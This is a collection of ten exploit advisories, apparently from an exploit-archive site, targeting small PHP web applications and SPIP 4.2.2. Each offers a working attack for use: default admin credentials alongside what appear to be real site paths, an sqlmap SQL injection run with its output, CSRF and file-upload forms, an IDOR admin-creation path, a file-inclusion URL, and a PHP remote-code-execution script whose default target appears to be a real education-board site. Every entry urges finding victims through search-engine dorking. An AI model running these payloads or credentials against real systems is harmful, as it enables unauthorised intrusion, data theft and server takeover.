<pre><code>=============================================================================================================================================<br />| # Title : LMS v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : File Management System 1.0 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] USe Payload : /downloads.php?file_id=2 <==== inject here <br /><br />[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/filemanagement/Private_Dashboard/downloads.php?file_id=2 --dbs<br /><br />---<br />[00:07:45] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.58, PHP 8.0.30<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[00:07:45] [INFO] fetching database names<br />[00:07:45] [INFO] fetching number of databases<br />[00:07:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />[00:07:45] [INFO] retrieved: 5<br />[00:07:45] [INFO] retrieved: information_schema<br />[00:07:54] [INFO] retrieved: file_management<br />[00:08:00] [INFO] retrieved: mysql<br />[00:08:02] [INFO] retrieved: performance_schema<br />[00:08:10] [INFO] retrieved: phpmyadmin<br />available databases [5]:<br />[*] file_management<br />[*] information_schema<br />[*] mysql<br />[*] performance_schema<br />[*] phpmyadmin<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eClass LMS v6.2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/eclass-learning-management-system/25613271 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@mediacity.co.in & pass = 123456<br /><br />[+] https://www/127.0.0.1/swarkalasangamcom/public/testimonial <==== Shell upload<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Task Management System 1.0 CSRF add staff Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new staff .<br /><br />[+] Go to the line 27.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : News Portal v4.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/?sdm_process_download=1&download_id=7643 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new Admin.<br /><br />[+] use payload : admin/register.php<br /><br />[+] http://127.0.0.1/dpnews.rw/admin/admin/register.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : MSMS-PHP v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Mount Carmel School v6.4.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://smart-school.in/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = superadmin@gmail.com & pass = password<br /><br />[+] https://www/127.0.0.1/demo/site/login<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Laundry Management System 1.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/online-laundry-management-system-source-code/?wpdmdl=6058&refresh=66bbd3015dcfe1723585281 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] USe Payload : /index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />[+] http://127.0.0.1/laundry_Management_System/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : File Management System 1.0 Arbitrary File upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 1 : Set your target.<br /><br />[+] Save As poc.html<br /><br />[+] Payload :<br /><br /> <form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data"><br /> <!-- Hidden Email Input --><br /> <input type="hidden" name="email" value=""><br /><br /> <!-- File Input --><br /> <label for="myfile">Upload File:</label><br /> <input type="file" id="myfile" name="myfile" required><br /><br /> <!-- Submit Button --><br /> <input type="submit" name="save" value="Save"><br /></form><br /><br />[+] /uploads/<br /> <br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.2 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // توليد الحمولة مع تضمين الأمر المراد تنفيذه<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // إعداد بيانات POST التي سيتم إرسالها إلى الهدف<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // تهيئة طلب HTTP باستخدام دالة cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // إضافة رؤوس مخصصة لتجاوز المنع<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // تنفيذ الطلب<br /> $response = curl_exec($ch);<br /><br /> // تحقق من وجود أخطاء في cURL<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// مثال على الاستخدام<br />$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
